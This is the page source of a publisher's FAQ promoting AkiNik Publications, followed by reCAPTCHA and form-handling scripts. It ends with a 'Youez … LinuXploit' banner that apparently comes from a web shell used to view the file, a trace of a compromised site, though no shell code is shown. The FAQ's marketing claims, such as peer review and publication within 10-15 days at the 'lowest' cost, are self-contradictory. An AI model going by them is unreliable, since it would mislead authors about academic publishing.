        </div>
        <div class="ab_accordion_section">
            <div class="ab_accordion_header"><span>2. Does AkiNik Publications offer global distribution?</span> <span class="material-icons">arrow_drop_down</span></div>
            <div class="ab_accordion_content">
			Yes! AkiNik Publications has a strong global distribution network. They collaborate with international distributors and academic libraries to ensure your book reaches readers worldwide. Whether you're targeting specific academic circles or a broader international audience, AkiNik ensures that your work is available across multiple regions.
            </div>
        </div>
        <div class="ab_accordion_section">
            <div class="ab_accordion_header"><span>3. What kind of support does AkiNik Publications offer authors?</span> <span class="material-icons">arrow_drop_down</span></div>
            <div class="ab_accordion_content">
			AkiNik Publications provides extensive support throughout the publishing process. This includes assistance with manuscript submission, peer-reviewing (for academic works), formatting, and even cover design. Their team helps to ensure your book is professionally produced and polished before it reaches the market.
            </div>
        </div>
        <div class="ab_accordion_section">
            <div class="ab_accordion_header"><span>4. How does the peer-review process work with AkiNik Publications?</span> <span class="material-icons">arrow_drop_down</span></div>
            <div class="ab_accordion_content">
			For academic authors, AkiNik offers a peer-review process to maintain the quality and credibility of your work. Once you submit your manuscript, it is evaluated by experts in your field who provide constructive feedback. This process ensures that your book meets scholarly standards, making it a respected resource within the academic community.
            </div>
        </div>
        <div class="ab_accordion_section">
            <div class="ab_accordion_header"><span>5. Can I publish both print and eBooks with AkiNik Publications?</span> <span class="material-icons">arrow_drop_down</span></div>
            <div class="ab_accordion_content">
			Absolutely! AkiNik Publications offers the flexibility to publish your work in both print and digital formats. This way, your book can reach a wider audience, including readers who prefer physical copies and those who prefer digital versions for their devices.
            </div>
        </div>
        <div class="ab_accordion_section">
            <div class="ab_accordion_header"><span>6. Does AkiNik Publications offer marketing and promotional support?</span> <span class="material-icons">arrow_drop_down</span></div>
            <div class="ab_accordion_content">
			Yes, AkiNik offers marketing services aimed at helping your book gain visibility. They assist with promotions through academic networks, libraries, and relevant conferences, particularly for research-heavy books. Their goal is to ensure that your work reaches the right audience, whether it's fellow researchers, educators, or students.
            </div>
        </div>
        <div class="ab_accordion_section">
            <div class="ab_accordion_header"><span>7. Is publishing with AkiNik Publications expensive?</span> <span class="material-icons">arrow_drop_down</span></div>
            <div class="ab_accordion_content">
			No, it is competitive and lowest. AkiNik Publications offers various pricing options depending on the type of publishing package you choose. While their services are competitive, the cost can vary based on factors like peer review, editing, formatting, and additional distribution services. However, for academic authors, the investment can be worthwhile due to the specialized audience and global reach.
            </div>
        </div>
        <div class="ab_accordion_section">
            <div class="ab_accordion_header"><span>8. How do royalties work with AkiNik Publications?</span> <span class="material-icons">arrow_drop_down</span></div>
            <div class="ab_accordion_content">
			Royalties with AkiNik Publications depend on the specific contract you enter into. Typically, authors receive royalties based on sales of their book, both in print and digital formats. AkiNik offers transparency when it comes to sales reports, so you can easily track how well your book is performing in the market.
            </div>
        </div>
        <div class="ab_accordion_section">
            <div class="ab_accordion_header"><span>9. How long does it take to publish with AkiNik Publications?</span> <span class="material-icons">arrow_drop_down</span></div>
            <div class="ab_accordion_content">
			The timeline for publishing with AkiNik varies based on the complexity of the project, especially if you're undergoing peer review. For most projects, the entire process—from manuscript submission to final publication—can take a 10-15 days. AkiNik will provide a more specific timeline once they've reviewed your project and understand the level of editing, formatting, and review required.
            </div>
        </div>
    </div>
</div>

<style>
#toast-container{min-width: 10%;top: 50%;right: 50%;transform: translateX(50%) translateY(0%);}
@media (max-width:768px) {
	#toast-container{width: 100%;}
}
</style>

<script id="recaptchaapiurl" src="https://www.google.com/recaptcha/api.js?render=6LdSR1gpAAAAANGL6NHCNF33osMAjWSBZFEQeDYs" defer></script>
<script defer>
	window.addEventListener('load', function () {
		grecaptcha.ready(function () {
			grecaptcha.execute((new URL(recaptchaapiurl.src)).searchParams.get('render'), { action: 'contact' }).then(function (token) {
				document.querySelectorAll('.recaptchaResponse').forEach(e => {
					e.value = token;
				})
			});
		});
	})
	function pageform(f) {
		if (document.querySelector('.toast')) {
			document.querySelector('.toast').remove();
		}
		f.submit.disabled = true;
		fetch(f.action, {method: 'post',mode: 'same-origin',cache: 'no-cache',headers: {'Accept': 'application/json'},body: new FormData(f)}).then(response => response.json()).then(r => {
			if(r.s === false) {
				M.toast({html: r.t, classes: 'red'})
			}
			if(r.s === true) {
				M.toast({html: r.t, classes: 'green'});f.reset();
			}
		}).catch(error => {alert(error)}).finally(() => {
			f.submit.disabled = false;
			grecaptcha.ready(function () {
				grecaptcha.execute((new URL(recaptchaapiurl.src)).searchParams.get('render'), { action: 'contact' }).then(function (token) {
					document.querySelectorAll('.recaptchaResponse').forEach(e => {
						e.value = token;
					})
				});
			});
		});
		return false;
	}
</script>

<?php
require_once('footer.php');
?>

Youez - 2016 - github.com/yon3zu
LinuXploit